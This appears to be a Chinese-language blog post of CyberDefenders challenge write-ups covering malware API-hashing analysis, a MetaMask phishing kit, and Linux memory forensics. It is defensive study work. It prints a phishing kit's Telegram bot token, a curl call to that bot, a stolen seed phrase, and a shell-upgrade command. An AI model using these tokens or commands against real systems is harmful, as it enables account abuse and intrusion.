cyberdefenders练习3

Posted on | In

前言

继续取证:)

$tealer(恶意软件分析)

question1

1
The provided sample is fully unpacked. How many sections does the sample contain?

使用PEBear工具查看,总共有4个section。

answer:4

question2

1
How many imported windows APIs are being used by the sample?

查看PEBear中的Imports,发现引用了KERNEL32.dll,其中包括了2个API。

answer:2

question3

1
The sample is resolving the needed win APIs at run-time using API hashing. Looking at the DllEntryPoint, which function is responsible for resolving the wanted APIs?

IDA反编译,进入DllEntryPoint查看,里面函数也不多,穷举都可以。根据题目描述我是拿了if语句中的函数,就过了。

asnwer:sub_6015C0

question4

1
Looking inside the function described in question 3, which function is responsible for locating & retrieving the targetted module (DLL)?

hinstDLL是DLL实例的句柄,也是DLL在该进程地址空间中的位置,而v4=hinstDLL,所以就找v4相关的函数,明显就是sub_607560,但答案不是这个,追踪进去发现return sub_607564(a1)

answer:sub_607564

question5

1
What type of hashing is being used for the API hashing technique?

在sub_607564去找加密逻辑,仍然是找if,定位到sub_61D620,跟踪进去后发现是CRC32。

answer:CRC32

question6

1
What is the address of the function which performs the hashing?

都叫sub_61D620了,地址肯定就是0x61D620了。

answer:0x61D620

question7

1
What key is being used for XORing the hashed names?

退回sub_607564,看到if ( v2 == (sub_61D620((int)v43, v16) ^ 0x38BA5C7B) )

answer:0x38BA5C7B

question8

1
What information is being accessed at the address 0X60769A?

锁定目标位置的代码:

1
2
3
mov     esi, [esi+18h]
test    esi, esi
jz      short loc_60768B

可以看到这里传递的信息就是这个esi,传递结束后就直接退出了,然后这个esi我看了半天也没看出个所以然,看到了里面有几行:

1
2
3
4
5
6
7
LABEL_12:
    ProcessEnvironmentBlock = NtCurrentTeb()->ProcessEnvironmentBlock;
    if ( v5 )
      return ProcessEnvironmentBlock->ImageBaseAddress;
    Ldr = ProcessEnvironmentBlock->Ldr;
    Flink = Ldr->InLoadOrderModuleList.Flink;
    Blink = Ldr->InLoadOrderModuleList.Blink;

我就try了下,答案试了试就出来了。

answer:BaseAddress

question9

1
Looking inside the function described in question 3, which function is responsible for locating & retrieving the targetted API from the module export table?

因为在DllEntryPoint中,有用到dword_62B1D4进行操作,这里就追踪到dword_62B1D4 = (int (__stdcall *)(_DWORD))sub_6015C0(-1590620315, 497732535);。然后试了下这个函数不对,那就进去看看return,发现return的也是一个函数,试了下那个就对了。

answer:sub_6067C8

question10

1
Diving inside the function described in question 8, what is being accessed at offset 0X3C within the first passed parameter?

这题根本看不懂,涉及了PE文件的hex组成,我参考了这篇文章:
PE文件学习笔记(一):DOS头与PE头解析
偏移0x3c的dos头中对应的是e_lfanew

answer:e_lfanew

question11

1
Which windows API is being resolved at the address 0X5F9E47 ?

这题大大的知识盲区了,提示:

1
2
googled more on dridex and apis
guessed at virtualalloc -nope

甚至还得猜,我就搜索了下dridex apis,找了半天也没看到什么东西,就直接按照资料+查找Kernel32.dll提供的api进行穷举,最后把结果试出来了。

answer:CreateThread

question12

1
Looking inside sub_607980, which DLL is being resolved?

找dll的话要通过sub_606C50,发现参数为1485485034,那么将其与0x38ba5c7b做xor后进行crc32。

answer:ntdll.dll

question13

1
Also Looking inside sub_607980, which API is being resolved?

提示给了篇文章:
Dridex Loader Analysis
通过对比特征得出api。

answer:RtlAddVectoredExceptionHandler

还有一半题目实在做不动了,先放着(。

GrabThePhisher(网页取证)

question1

1
Which wallet is used for asking the seed phrase?

源代码文件夹就有个叫metamask的,查了下这个就是一种钱包。

answer:metamask

question2

1
What is the file name that has the code for the phishing kit?

钓鱼网站的代码文件,直接进metamask文件夹就看到了。

answer:metamask.php

question3

1
In which language was the kit written?

啊都php文件了,语言除了php还能是别的吗。

answer:php

question4

1
What service does the kit use to retrieve the victim's machine information?

查看metamask.php文件,定位$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']); ,改下格式和大小写即为答案。

answer:Sypex Geo

question5

1
How many seed phrases were already collected?

根据metamask.php,我们知道钱包被存在了log/log.txt中,查看后发现有3个钱包。

answer:3

question6

1
Write down the seed phrase of the most recent phishing incident?

log.txt中的第三行就是了。

answer:father also recycle embody balance concert mechanic believe owner pair muffin hockey

question7

1
Which medium had been used for credential dumping?

回到metamask.php中,定位$filename = "https://api.telegram.org/bot".$token....,可以看到用的是电报进行数据传输。

answer:telegram

question8

1
What is the token for the channel?

还是在metamask.php中。

answer:5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

question9

1
What is the chat ID of the phisher's channel?

还还是在metamask.php中。

answer:5442785564

question10

1
What are the allies of the phish kit developer?

还还还是在metamask.php中。

answer:j1j1b1s@m3r0

question11

1
What is the full name of the Phish Actor?

curl以下那个电报的api:curl https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564

answer:Marcus Aurelius

question12

1
What is the username of the Phish Actor?

同样是上面那个api。

answer:pumpkinboii

Seized(Linux内存取证)

question1

1
What is the CentOS version installed on the machine?

使用python2 vol.py -f ../dump.mem --profile=LinuxCentos7_3_10_1062x64 linux_banner,看到linux内核版本为3.10.0-1062.el7.x86_64,去查一下这个内核对应的centos版本即可。

answer:7.7.1908

question2

1
There is a command containing a strange message in the bash history. Will you be able to read it?

使用python2 vol.py -f ../dump.mem --profile=LinuxCentos7_3_10_1062x64 linux_bash查看bash历史,有一串base64,解码就是答案了。

answer:shkCTF{l3ts_st4rt_th3_1nv3st_75cc55476f3dfe1629ac60}

question3

1
What is the PID of the suspicious process?

使用python2 vol.py -f ../dump.mem --profile=LinuxCentos7_3_10_1062x64 linux_psaux查看进程运行命令与执行时间,发现PID为2854的进程执行了可疑的反弹shell命令。

answer:2854

question4

1
The attacker downloaded a backdoor to gain persistence. What is the hidden message in this backdoor?

只说了有个后门,什么信息都不给,搜索了下backdoor相关的也没找到,看了下之前的bash历史发现下载了个叫PythonBackup的,分析下相关文件PythonBackup.py,查看调用后锁定到snapshot.py,发现一个链接https://pastebin.com/raw/nQwMKjtZ,curl一下得到一个base64,解码得到答案。

answer:shkCTF{th4t_w4s_4_dumb_b4ckd00r_86033c19e3f39315c00dca}

question5

1
What are the attacker's IP address and the local port on the targeted machine?

之前有看到反弹ip的端口是12345,所以我们进行端口查找时可以进行过滤:python2 vol.py -f ../dump.mem --profile=LinuxCentos7_3_10_1062x64 linux_netstat | grep 12345

answer:192.168.49.1:12345

question6

1
What is the first command that the attacker executed?

还是看psaux就行了。

answer:python -c import pty; pty.spawn(“/bin/bash”)

question7

1
After changing the user password, we found that the attacker still has access. Can you find out how?

我们把最后一次/bin/bash进程给dump下来:linux_dump_map --pid 2887 -D ../bash1,然后把内容给放到txt里,搜索了下格式和base64,答案是以base64存储的。

answer:shkCTF{rc.l0c4l_1s_funny_be2472cfaeed467ec9cab5b5a38e5fa0}

question8

1
What is the name of the rootkit that the attacker used?

看dmesg:

1
2
3
[172141977023.172] sysemptyrect: loading out-of-tree module taints kernel.
[172142219596.172] sysemptyrect: module verification failed: signature and/or required key missing - tainting kernel
[172143083725.172] CRC65: rdy to encrypt stuff!

answer:sysemptyrect

question9

1
The rootkit uses crc65 encryption. What is the key?

直接搜strings dump.mem |grep crc65

asnwer:1337tibbartibbar